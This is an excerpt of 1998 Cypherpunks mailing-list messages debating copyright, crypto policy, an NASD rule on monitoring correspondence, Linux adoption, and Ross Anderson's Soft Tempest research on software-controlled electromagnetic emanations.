IFR1IDwxMDI1MzQuMjE2NUBjb21wdXNlcnZlLmNvbT6JAJUDBRAzyUJWl7OYGuXZ
FeEBAc4TBACT8gLtyE0C8NBGs9aDa9kHfeNzN8VbNfUpoOiWi4duAAZFiAt/e+ji
J2BUMLIY8kzm2WX4mVzpKYjvea5TtHeQgbESV1HVZ5k7abENMUYz5nSMloOE+bb+
XRzgGgFF3htGXDJNywlLNgoYi5vTMT0pbGlCzOu215Cc4mFls2w1iA==
=CM85
-----END PGP PUBLIC KEY BLOCK-----
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 8 Feb 1998 06:16:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Monthly memory giveaway - now win up to 64 Megabytes of Memory!
In-Reply-To: <854712721210.8391275815@compbroker.com>
Message-ID: <199802072158.WAA15417@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for contacting us to request a security audit of your web site.
Based on the information you provided, we have determined that you were
running an insecure operating system (Microsoft Windows NT) as evidenced
by the blue screen currently visible on your computer monitor.  Should you
wish further investigation of your site vulnerabilities, please continue
to send us annoying spam requests.


contest@compbroker.com wrote:

>       For the February 1st Drawing, our grand prize winner of the
>                             64MB Memory is
> 
>                      Michael Rowe of Akron, OH
> 
> You could be the next lucky winner!
> 
> The Memory Broker has increased it's prizes.  Every month
> we will select 3 random winners from our contest database.
> The First Place winnner (i.e. first name drawn) wins an incredible 64Mb of
> RAM,
> 2nd place wins 32MB of EDO RAM, and the third lucky winner gets 16MB of RAM. 
> You can also apply the winning memory as credit towards a future order.
> 
> No purchase is necessary to win.  Winners are selected by a random drawing,
> so the more times you enter (once per day only please), the better your
> chances to win!
> 
> Enter Now at http://www.compbroker.com/
> 
> Good Luck!
> 
> The Memory Broker Inc.
> http://www.compbroker.com
> contest@compbroker.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 8 Feb 1998 13:40:08 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Galombos and a World where Ideas can be Protected (fwd)
Message-ID: <199802080535.XAA12696@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 7 Feb 1998 10:33:41 -0800
> From: Tim May <tcmay@got.net>
> Subject: Galombos and a World where Ideas can be Protected

> >If there were no copyright, markets for information and entertainment
> >would definitely have evolved differently than they have in the US
> >and Europe, and would use much different mechanisms for getting money
> >to the producers of information, such as standard sale contracts.*
> ....
> 
> It's always hard to say how reality would look in a different universe, one
> with, say, no copyright laws.

Agreed, however the motivations that drive people to creative or
constructive acts wouldn't change.

> However, we have some indications, because there are some things which are
> very much like "intellectual property" which, in fact, have no protection
> in the courts.
> 
> Namely, _ideas_.
> 
> For better or for worse, ideas are not protected against copying, use, etc.

Agreed, but the ability to carry through on them *is* criticaly dependant
upon the social and technological infrastructure of the participants. 

> And yet society works fine. Those who keep coming up with ideas find ways
> to keep coming up with ideas, and often to prosper, as writers,
> consultants, etc., often because of their ability to generate ideas.

True, but what you are leaving out is their ability to impliment those
ideas, which most certainly depends upon the infrastructure that surrounds
them. Ideas abhor a vacuum. In such an environment it is reasonable to
assume that people would not loose their basic instincts, among them greed.
So it is clear that people would not stop having ideas, but the milieu of
those ideas would be restrictive and most probably very paranoid. If you
learned of a particular process or idea it would not be in your best
interest to pass it around. Further it would be very difficult to trust
others because there would be no consequence to them taking your idea and
using their resources (which the creator was depending on to actualize the
concepts) to create the end product themselves. Remember the prisoners
dilema here...

> Think about an alternate world where ideas are protectable before saying a
> world without copyrights would collapse inevitably.

This is a straw man. We are discussing the issue of what would be reasonable
to expect considering human nature in an environment where there was *no*
protection of ideas and no redress of grievances through a legal system.
Intellectual anarchy if you will.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 8 Feb 1998 13:46:15 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <199802080545.XAA12816@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 06 Feb 1998 18:12:38 -0800
> Original-From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: the best justice money can buy --Lessig (fwd)

> >If there were no copyright nobody would have any reason to market 
> >software or much else for that matter. I would predict that much of 
> >the technology and infrastructure we have now wouldn't exist. 
> >It would also stiffle [sic] creativity and new methodologies because 
> >there would be no profit in it to recoup development costs.
> 
> If there were no copyright, markets for information and entertainment
> would definitely have evolved differently than they have in the US
> and Europe, and would use much different mechanisms for getting money
> to the producers of information, such as standard sale contracts.*
> On the other hand, if there were no colonialism, markets for sheep in
> New Zealand would have evolved much differently than they did,
> a problem they're now gradually working their way out of.

The point is that it would *not* effect single instances or markets, it
would effect the very fabric of trust that is inherent in a society that
rewards creativity. If there were no copyrights and by extension no
protection for the creator or implimentor of an idea we would have a
situation where the groups with the resources would be the ones able to best
actualize and therefore reap the benefits of ideas. In such an environment
why would some individual choose to go head to head in a battle they
couldn't win due to resources and a lack of a standard infrastructure?
They wouldn't, they'd go back home and grow food and mind their own
business. They wouldn't exchange ideas because it could be taken as a given
that mail and other forms of non-direct communications would be insecure.
>From this we can deduce that the actual target of delivery would very likely
not receive it and that some intermediary would in fact take possession of
that material and take advantage of it. So we can assume that people would
not work on colaborations bigger than their immediate neighborhood. Now it
is also clear that within that neighborhood some will have more resources to
actualize ideas in respect to many of those who actualy create the ideas.
In such an environment why would the individual increase this parties
resource share to their own detriment? They wouldn't.

> Copyright is certainly a major market convenience, because it means
> that individual authors, middlemen, and readers don't have to
> negotiate contracts each time they trade information for money,
> or having to read the annoying shrink-wrap licenses on books
> the way they did for a while on packaged software.  It also
> makes it more difficult for alternative mechanisms to evolve,
> because it's got an 800-pound well-armed gorilla subsidizing it.

The protection of ideas and the reaping of the actualization of the creation
going to the creator is the issue, copyright is simply one of many
mechanisms that impliment this fundamental belief of who should benefit. If
we do away with this we are also doing away with a much deeper and
fundamental aspect of modern society, trust that our toil will benefit us in
the end.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 8 Feb 1998 16:25:05 +0800
To: tcmay@got.net
Subject: Re: Most elegant wording against privacy/law-enforcement "balance"
In-Reply-To: <v03102804b101759635ad@[207.167.93.63]>
Message-ID: <199802080814.DAA03319@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
|Jim wrote:
| >The most detailed research on the issue is a study by Dorothy Denning
| >and William Baugh investigating the extent to which crypto has
| >interfered with law enforcement's ability to get convictions: their
| >bottom line was that crypto has not in fact interfered: law enforcement
| >has been able to complete their investigations using other means.
| >There's no demonstrated need for Government Access to Crypto Keys
| >(GACK), so there's no need to compromise away our privacy.
| 
| Bluntly pu, "FUCK "DEMONSTRATED NEED"!"
| 
| And what if Denning and Baugh had reached other conclusions? (As well they
| might, next year, when crypto is more widely deployed.)

	Its a utilitarian, and useful argument to point out that the
Clipper Chick has been forced to change her position based on observed
reality.  Its not the basis of our moral argument, only pointing out
that the only academic to hold a position not in line with ours was
intellectually honest enough to say she's unsupported by the facts.

	This is not to say that crypto is ok as long as it doesn't
matter, or the police have legitamate needs that they may define, but
that when their own spokespeople reject them, its a powerful argument.

	Much as you rejoice in terrorist use of encryption, I rejoice
in being able to quote Dorothy Denning. :)

	(I have a great deal of respect for Dorothy Denning's
willingness to take and argue unpopular positions, and change her mind
when proven wrong.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 9 Feb 1998 16:36:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Most elegant wording against privacy/law-enforcement "balance"
In-Reply-To: <9802070144.AA11833@mentat.com>
Message-ID: <3.0.5.32.19980208073437.007cd710@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> What are the most elegant rebuttals to politicians saying we
>> need Key Recovery as a "reasonable balance between the needs of
>> law enforcement vs. freedom of crypto"?

Someone, probably Jim Ray, has a nice phrase about
"Protecting the Fourth Amendment _is_ one of the legitimate needs
of law enforcement."  It's not an in-depth critique, but it's enough to
get a rant off to a good start, where you're on the moral high ground,
rather than the "Even the FBI's friends like Dorothy haven't found
a legitimate need for increasing wiretaps", which is a useful place
to go as long as you're already ahead.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 8 Feb 1998 22:16:14 +0800
To: cypherpunks@toad.com
Subject: Re[2]: SEC Rule Announcement
Message-ID: <v04003a12b10369bb9bea@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: jmuller@brobeck.com
X-Server-Uuid: b0fe6c76-9e59-11d1-b373-00805fa7c2de
MIME-Version: 1.0
Date: Thu, 5 Feb 1998 14:39:08 -0800
Subject: Re[2]: SEC Rule Announcement
To: "Robert Hettinga" <rah@shipwright.com>, <dcsb@ai.mit.edu>,
        "Arnold G. Reinhold" <reinhold@world.std.com>
X-WSS-ID: 18C49FCB618-18C49FCB619-01
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: jmuller@brobeck.com

     This is actually an NASD rule change; the SEC reviews proposed NASD
     rule changes and almost always approves them.  The NASD rule change is
     in Notice to Members 98-11 (available at
     http://www.nasdr.com/2610.htm), and was approved by the SEC on
     December 31, 1997, effective February 15.

     The NASD views the change as simply clarifying a requirement that was
     already in place:  the rule previously required that NASD member
     broker/dealers establish procedures for the review of all
     correspondence relating to solicitation or execution of securities
     transactions.  The rule as amended will state that these procedures
     must apply to all incoming and outgoing written and electronic
     correspondence with the public relating to the firm's investment
     banking or securities business.  The rule itself does not say anything
     about home offices, but in the introduction to the rule, the NASD says
     that it will "expect members to prohibit correspondence with customers
     from employees' home computers or through third party systems unless
     the firm is capable of monitoring such communications."

     My mama taught me if I can't say anything nice, I shouldn't say
     anything at all, so I will not comment on the rule.  If you're
     interested enough to go to the NASD Web site shown above, you will
     probably also want to look at Notice to Members 98-3, which sets out
     general principles for electronic delivery of information between
     brokers and their customers.


     John Muller
     mailto:jmuller@brobeck.com

For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 8 Feb 1998 23:07:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: the best justice/kinds of monopolies
In-Reply-To: <v03102801b10142692f86@[207.167.93.63]>
Message-ID: <3.0.2.32.19980208100314.03723538@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:41 PM 2/6/98 -0800, bill.stewart@pobox.com wrote:

>I don't care if they call their boss Grand Wazoo Snail Mail Evangelist;
>there are software and ice cream companies that use non-standard titles too.
>"Postal Inspector" is a much more serious problem title, since they
>seem to have quasi-police powers to do criminal investigations of
>postal offenses like pornography and pyramid scams and running competing
>formatted-tree-product information delivery services.

A few years ago, they actually said that they stopped the armed raids on corporate mailrooms to investigate the crime of using Fedex for non-critical First Class deliveries.  The Postal Inspectors are still Peace Officers, however.  But then so are the Railroad Police.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Feb 1998 00:00:57 +0800
To: cypherpunks@toad.com
Subject: Soft Tempest
Message-ID: <1.5.4.32.19980208154341.00728278@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



To: ukcrypto@maillist.ox.ac.uk
Subject: It is really me - the story of Soft Tempest
Date: Sun, 08 Feb 1998 15:09:40 +0000
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>

Bruce Sterling, and others, have asked of the Washington Post story
[see below]:

> Is this story correct?

The Washington Post gives a highly distorted account of some very
important scientific work we have done. I suggest that list members
read our paper - <www.cl.cam.ac.uk/~mgk25/ih98-tempest.pdf> - for
themselves before getting carried away.

The story is as follows. Bill G gave our department $20m for a new
building, and his people said that what they really wanted from our
group was a better way to control software copying.  So it would have
been rather churlish of us not to at least look at their `problem'.

Now the `final solution' being peddled by the smartcard industry (and
others) is to make software copying physically impossible, by tying
program execution to a unique tamper-resistant hardware token. We
wouldn't like to see this happen, and we have already done a lot to
undermine confidence in the claims of tamper-proofness made by
smartcard salesmen.

So Markus and I sat down and tried to figure out what we could do for
the Evil Empire. We concluded that 

(1)  large companies generally pay for their software; 

(2)  if you try to coerce private individuals, the political backlash 
     would be too much; 

so 

(3)  if the Evil Empire is to increase its revenue by cracking down on
     piracy, the people to go after are medium sized companies.

So the design goal we set ourselves was a technology that would enable
software vendors to catch the medium-sized offender - the dodgy
freight company that runs 70 copies of Office 97 but only paid for one
- while being ineffective against private individuals.

We succeeded.

In the process we have made some fundamental discoveries about
Tempest. Army signals officers, defence contractors and spooks have
been visibly flabberghasted to hear our ideas or see our demo.

In the old days, Tempest was about expensive hardware - custom
equipment to monitor the enemy's emissions and very tricky shielding
to stop him doing the same to you. It was all classified and strictly
off-limits to the open research community.

We have ended that era. You can now use software to cause the
eavesdropper in the van outside your house to see a completely
different image from the one that you see on your screen. In its
simplest form, our technique uses specially designed `Tempest fonts'
to make the text on your screen invisible to the spooks. Our paper
tells you how to design and code your own.

There are many opportunities for camouflage, deception and misconduct.
For example, you could write a Tempest virus to snarf your enemy's PGP
private key and radiate it without his knowledge by manipulating the
dither patterns in his screen saver. You could even pick up the signal
on a $100 short wave radio. The implications for people trying to
build secure computer systems are non-trivial.

Anyway, we offered Bill G the prospect that instead of Word radiating
the text you're working on to every spook on the block, it would only
radiate a one-way function of its licence serial number.  This would
let an observer tell whether two machines were simultaneously running
the same copy of Word, but nothing more. Surely a win-win situation,
for Bill and for privacy.

But Microsoft turned down our offer. I won't breach confidences, but
the high order bit is that their hearts are set on the kind of
technology the smartcard people are promising - one that will
definitively prevent all copying, even by private individuals. We
don't plan to help them on that, and I expect that if they field
anything that works, the net result will be to get Microsoft
dismembered by the Department of Justice.

Meantime we want our Soft Tempest technology to be incorporated in 
as many products as possible - and not just security products!

So to Rainier Fahs, who asked:

> If these rumors are true, I guess we will face a similar discussion on
> free availability in the area of TEMPEST equipment. Does privacy
> protection also include the free choice of protection mechanism?

I say this: our discovery, that Tempest protection can be done in
software as well as hardware, puts it beyond the reach of effective
export control. So yes, you now have a choice. You didn't before,

Ross Anderson

----------

http://www.washingtonpost.com/wp-srv/WPlate/1998-02/07/060l-020798-idx.html

British Technology Might Flush Out Software Pirates

By John Burgess
Washington Post Foreign Service
Saturday, February 7, 1998; Page H01 

CAMBRIDGE, England- It's a technique that intelligence
agencies have used for years: Park a van filled with
monitoring gear near an embassy and listen for the faint radio
signals that computers routinely emit when they are on.
Analyze those signals for clues to the data that are on the
computers.

Now researchers at the University of Cambridge, home of
groundbreaking work in intelligence over the years, are trying
to adapt this technology to the fight against software piracy.
With special code written into software, they say, computers
could be made to broadcast beacons that would carry several
hundred yards and identify the software they were running,
complete with serial numbers of each copy.

Vans run by anti-piracy groups could pull up outside a
company's office and count the number of software signals
emanating from it. If, say, 50 beacons for a particular title
were detected but the company had licensed only two copies
of the software, that could become evidence on which a court
would issue a search warrant.

Ross Anderson, a University of Cambridge lecturer who is
overseeing the project, said the idea originated last year when
Microsoft Corp. Chairman Bill Gates visited the university
after his private foundation announced a $20 million donation
to the school. Gates told officials that, among other things, he
would love the university to come up with new anti-piracy
techniques.

So far, Microsoft isn't enthusiastic about the university's
approach, Anderson said. "They have some reservations.
Obviously there are Big Brother aspects," he said. A
Microsoft spokeswoman said the company has no plans to
adapt the technology.

Emilia Knight, a vice president at BSA Europe, a trade group
that combats software piracy, said such an anti-piracy system
might be technically feasible. But she noted many practical
questions on the legal side, such as how the system would
differentiate between companies pirating software and those
legally using multiple copies of programs.

Knight said that concerns of privacy and consumer rights
might make the system a no-go for industrialized countries.
But in places like Eastern Europe, she suggested, where piracy
is rampant and there is no tradition of such protections, the
software signal detectors might be acceptable.

Richard Sobel, a political scientist who teaches at Harvard
University and researches privacy issues, called it "an
appalling idea."

"If the technology is there to identify what software people are
using, there's the prospect to figure out what people are doing.
. . . It sounds like a horrible violation of privacy," Sobel said.

In Britain, however, it might seem less controversial. Here
authorities have long used similar techniques to ferret out
people who fail to pay the annual license fee of about $150
that the law requires for each TV set in the country.

Cruising the streets here are vans carrying equipment that can
detect emissions from a TV set's "local oscillator," the part
that turns a station's signal into a picture. If the gear senses a
TV set inside a house from which there is no record of a
license payment, this is used as evidence to levy fines.

The system also can tell what channel people are watching
because the oscillator gives off a slightly different signal for
each one.

Anderson's researchers have built a prototype that can detect
the type of software running on a machine from short range --
the hallway outside the room where the computer is running.
Anderson said they are ready to build prototype hardware
with a longer range, at a cost of about $15,000-$30,000 -- if
the lab can find a customer. So far, none has stepped forward.

(c) Copyright 1998 The Washington Post Company

----------

Date: Sat, 7 Feb 1998 13:05:45 -0500
From: Stewart Baker <sbaker@steptoe.com>
To: ukcrypto <ukcrypto@maillist.ox.ac.uk>
Subject: Ross, Is that really you?
     
     Today's Washington Post claims that a Cambridge research team led by one 
     Ross Anderson is developing technology that would require all personal 
     computers to broadcast the identity of all programs they are running so 
     that anti-piracy investigators can sit outside universities and businesses 
     and check to see whether the folks inside are running more programs than 
     their licenses allow.  
     
     The article says that even Microsoft thinks this might go too far in 
     invading the privacy of computer users. But advocates for the technology 
     claim that it will work fine in benighted Eastern European countries where 
     piracy is rampant and the natives are used to having their privacy invaded.
     
     This raises at least three questions:
     
     1.  Is this story correct?
     
     2.  If so, is the Ross Anderson it describes the same Ross Anderson known 
     on this list for his attacks on Big Brother?
     
     3.  If so, are we to understand that Ross objects not so much to invading 
     privacy as to government competition in that endeavor?
     
     Stewart Baker






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 01:06:35 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <199802081704.LAA14031@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 06 Feb 1998 21:13:43 -0800
> Original-From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: the best justice money can buy --Lessig (fwd)

> At 08:21 AM 2/6/98 -0600, Jim Choate wrote:
> > Let's give the market another 5-10 years and see where Linux
> >stands. Right now the estimate is 6-10 million users world wide use it. Share
> >wise that isn't a lot. The reason that Linux garners so much press right now
> >is that it is in fact an exception when an organization uses the software
> >(eg NASA). The test will be whether it grows significantly over the long
> >run and not the 5 years that Linux has been a serious os.
> 
> Sharewise, that's not bad for a system that had 1 million users a 
> year or two ago, though of course it gains a lot of extra slack
> because it's quasi-free Unix on an affordable platform.

I agree.

> Getting that much desktop support without running MSOffice is
> impressive.

Is it? The vast majority of those users are non-commercial users. The number
of US users, currently estimated at 6M is *not* significantly different than
the number of home users of C64's and Amiga's (both machines had a very poor
commercial market penetration) and also had maximum market penetrations in
the 6M range. This consistency would seem to indicate to me that there
is a significant overlap in the home users and the Linux community and that
this community stays reasonably stable as a constant percentage of total
population and not the software alone. The question at this point is how
will this number change over the next 2 years or so. If we don't see a
significant rise in this percentage then I would suspect Linux will never
succeed in making a serious bid for MS parity. It is still a rare thing for
an employer to provide Linux as a the default os on a new-hires pc. How many
companies do you know that when a person comes in and configures their pc it
contains Linux by default? Not many. Further that percentage is *not*
increasing at any sort of significant rates. I would prophecy that you will
have to wait a long(!) time before you can expect your local grocery store
(HEB here uses Win95 and various Unix'es for back-office and check-out) or
bank to be using it as a de facto standard.

Also, considering that the folks who are making money on Linux are the
distributors. How have they faired over the last 4-5 years? If you go to your
1st year Linux Journals (only 12/yr. and the Feb. 98 is #46) and compare it
to your current issue how do the number of distributors fair? It turns out
there are only a few major distirbutors (Red Hat, Slackware, InfoMagic,
Walnut Creek, SuSE) and some of the early distributors have seen a
significant decrease in their market share (eg Ygddrasil). So even in the
Linux community we have seen a *decrease* in the *commercial* enterprises
who have succeeded? Why? Because users like to have the same distribution as
their friends so that they have some hope of resolving their problems. So
what you see (and this is from my 4+ years working with Linux user groups)
is that the majority of members of a given user group will have only 1 or 2
distributions and unless you have one of those most of them will be very
hesitant to work on it because of the ignorance factor of the special
features and changes of each distribution. The local Austin Linux Group
(alg-l@lists.io.com) for example is moving currently from Red Hat to SuSE
because of the superior, and propietary - I would add, X-windows and RPM
modifications they have made.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Veral <veral@geocities.com>
Date: Mon, 9 Feb 1998 01:24:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199802081713.LAA09053@harper.uchicago.edu>
MIME-Version: 1.0
Content-Type: text/plain



CAn I join?


Your Pal,

V.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 9 Feb 1998 02:06:15 +0800
To: ravage@ssz.com (Jim Choate)
Subject: Re: the best justice money can buy --Lessig (fwd)
In-Reply-To: <199802081704.LAA14031@einstein.ssz.com>
Message-ID: <199802081759.LAA15724@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> succeed in making a serious bid for MS parity. It is still a rare thing for
> an employer to provide Linux as a the default os on a new-hires pc. How many
> companies do you know that when a person comes in and configures their pc it
> contains Linux by default? Not many. Further that percentage is *not*S

This is true, but you have to keep it in the right perspective. The
much more interesting question is a broader one: how widespread is GNU
copyrighted freeware?

One can configure a Sun workstation so that it looks, works and feels like
a Linux system, runs things like elm, fvwm2, vim, GNU utilities,
and so on.  I have seen a lot of such configurations, and in fact I do
use one like that myself.

How many millions more of these do exist?

[I think that Sun workstations in their default configurations suck big
time as far as user friendliness is concerned. They have the balls to
ship an OS where the Page Up key does not work with the default editor]

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Feb 1998 01:13:44 +0800
To: cypherpunks@toad.com
Subject: Re: Soft Tempest
Message-ID: <1.5.4.32.19980208170553.0074d0bc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Much praise is due Markus and Ross for their astonishing
accomplishment in long-neglected Tempest research.

Their paper is surely causing sleeplessness in dens of
TEMPESTed security agencies accustomed to having
singular self-privacy and others-invasiveness via this 
technology. 

Microsoft is to be praised for funding the right thing for the 
wrong reasons, or perhaps Mr. Gates foresaw what the 
outcome would be and merely needs intel deniability,
nicely aided by Ross's zipperedness -- that, too, well done.

The Wash Post spin of the story is itself complicitous,
as was Mr. Baker's enticement. Thanks to both for aiding 
the incovert global revelation.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 02:05:00 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Another Linus market observation...
Message-ID: <199802081806.MAA14516@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Another Linux market observation that would indicate that the total impact
of Linux is going to be less than what we as Linux supporters would want
is the literature that has arisen about Linux. In particular the count of
monthly magazines. Linux has a roughly 6M user market penetration yet there
is only a single Linux specific magazine available. In the comparative
markets of C64 and Amiga there were several (eg Amiga World, Info, Compute!)
magazines. Even today there are at least 3 Amiga magazines on the market yet
that machine hasn't been actively manufactured in over 2 years. Why is the
Linux magazine market limited to The Linux Journal? And what does that mean
for the long term strength of the market (and by extension the hurdles other
OS's would face in the future)?


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 02:22:20 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <199802081824.MAA14700@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: the best justice money can buy --Lessig (fwd)
> Date: Sun, 8 Feb 1998 11:59:01 -0600 (CST)
> From: ichudov@algebra.com (Igor Chudov @ home)

> Jim Choate wrote:
> > succeed in making a serious bid for MS parity. It is still a rare thing for
> > an employer to provide Linux as a the default os on a new-hires pc. How many
> > companies do you know that when a person comes in and configures their pc it
> > contains Linux by default? Not many. Further that percentage is *not*S
> 
> This is true, but you have to keep it in the right perspective. The
> much more interesting question is a broader one: how widespread is GNU
> copyrighted freeware?

Outside of Linux applications? Very small. I have never worked for a company
nor dealt with a customer who as a matter of course used GNU software and was
in fact the accepted cannon of that companies computer use policies.
Students, individual hobbyist, and small companies (one of the reasons I
focus on SOHO in my consulting) are the marked exceptions. The reason these
folks can get away with it is their customers if they have any are concerned
about the end product and not the process. This isn't true of larger
companies who are as concerned with the process because of the impact of
budgets, quality control, purchasing, etc.

> One can configure a Sun workstation so that it looks, works and feels like
> a Linux system, runs things like elm, fvwm2, vim, GNU utilities,
> and so on.  I have seen a lot of such configurations, and in fact I do
> use one like that myself.

As I do, I have a ELC and a Tadpole 3XP that I use Linux on as well as
Solaris. I also have a IBM N40 RS/6000 laptop that I run AIX 3.x and PPC
Linux on. I've been waiting 2 years for the Linux68k to be ported to the
Sun 4/380 platform so I can get rid of BSD on that machine, and the /dev/fb
for the Tadpole on Linux SPARC has been in the wings about that long as well.
In the Austin area (1M pop.), I have yet to find a single other soul who as
a matter of course uses Linux on those platforms. At best I know of about a
dozen people who play with it and every case I am the one who got them the CD
and prompted their activity. My experience would indicate the interest and by
extension future is not there for these platforms except as a point of
esoteric interest. Believe me, I *wish* I had more people to talk to and work
with on these platforms. I can kill just about any discussion in a Linux
user group meeting by asking about SPARC or PPC versions, nobody
(figuratively) uses them and nobody is really interested in learning about 
them.

I know of only a couple of articles in the Linux Journal that has even
discussed SPARC Linux (and that would indicate a lot of folks don't use it)
and have never seen a PPC article.

> How many millions more of these do exist?

Very few. The total number of SPARC or PPC (not Mac mkLinux) is measured in
the 10's of thousands at best. Consider that out of all the Linux
distributors only a couple carry SPARC or PPC versions.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
